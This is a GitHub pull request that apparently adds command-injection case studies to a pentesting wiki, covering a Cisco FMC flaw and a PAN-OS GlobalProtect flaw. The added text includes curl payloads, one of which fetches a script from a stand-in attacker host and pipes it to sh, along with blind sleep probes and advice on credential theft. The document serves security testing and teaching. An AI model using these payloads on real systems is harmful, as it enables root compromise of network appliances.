Skip to content

Research Update Enhanced src/pentesting-web/command-injectio... #1609

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed
wants to merge 1 commit into from
Closed

Research Update Enhanced src/pentesting-web/command-injectio... #1609

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
40 changes: 39 additions & 1 deletion src/pentesting-web/command-injection.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -189,6 +189,43 @@ topicurl=<handler>&param=-n
topicurl=setEasyMeshAgentCfg&agentName=;id;
```

### Recent exploitation case studies (2024-2025)

#### CVE-2024-20424 – Cisco Secure FMC

Cisco’s October 2024 advisory describes how insufficient validation in the FMC web UI lets any authenticated Security Analyst send crafted HTTP requests that run as root on the appliance and can even relay commands to managed Firepower Threat Defense devices.

- Capture the `X-auth-access-token` issued after login, fuzz every JSON field exposed by the `/api/*` endpoints you can reach, and look for time-based delays or OOB hits when injecting shell metacharacters (`;`, `&&`, ``$()``).
- Because the issue only requires the read-only Security Analyst role, low-priv credential theft (password spraying, API key reuse, IDOR) is enough to reach a root shell.
- Successful exploitation lets you push the same malicious command set to downstream FTD sensors, so compromise of the manager often implies compromise of the fleet unless job queues are purged.

Example test once you control a session token and suspect a vulnerable endpoint:

```
curl -sk -X POST https://<fmc-host>/<vulnerable-endpoint> \
-H "X-auth-access-token: $TOKEN" \
-H "Content-Type: application/json" \
-d '{"name":"backup;curl attacker/t.sh|sh","type":"SystemTask"}'
```

Swap `<vulnerable-endpoint>` for any job/diagnostic path that reflects your user input in CLI wrappers and watch for delayed responses, DNS callbacks, or files written under `/var/sf/`.

#### CVE-2024-3400 – PAN-OS GlobalProtect Gateway

Alert Logic tracked CVE-2024-3400 as a zero-day in April 2024 that let unauthenticated attackers gain root on GlobalProtect gateways running PAN-OS 10.2.x < 10.2.9-h1, 11.0.x < 11.0.4-h1, or 11.1.x < 11.1.2-h3 before Palo Alto shipped hotfixes.

- Target appliances that expose both GlobalProtect gateway and device telemetry; whenever telemetry is enabled, arbitrary files dropped under `/opt/panlogs/tmp/device_telemetry/` will be processed with root privileges.
- Because exploitation is unauthenticated and network-facing, add these endpoints to unauthenticated fuzzing corpora and look for parameters that are piped into shell commands (e.g., HIP report fields, telemetry IDs) by chaining `;sleep 5` or DNS callbacks.

Minimal unauthenticated probe to confirm command execution via time-based payloads:

```
curl -sk -X POST https://<pan-fw>/<globalprotect-endpoint> \
--data-urlencode "telemetry_token=$(printf 'blind;sleep 6;#')"
```

Monitor response times plus outbound DNS/HTTP to confirm the payload fired without needing response data. Treat success as evidence that the management-plane user `root` executed the payload and immediately collect device telemetry bundles for further persistence hunting.

## Brute-Force Detection List


Expand All @@ -199,12 +236,13 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject

## References

- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
- [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection)
- [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html)
- [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php)
- [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
- [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/)
- [Cisco Secure Firewall Management Center – CVE-2024-20424 Advisory](https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-fmc-cmd-inj-v3AWDqN7.html)
- [Alert Logic – PAN-OS GlobalProtect CVE-2024-3400](https://support.alertlogic.com/hc/en-us/articles/360051675174-CVE-2024-3400-Palo-Alto-Networks-PAN-OS-Command-Injection-Vulnerability)

{{#include ../banners/hacktricks-training.md}}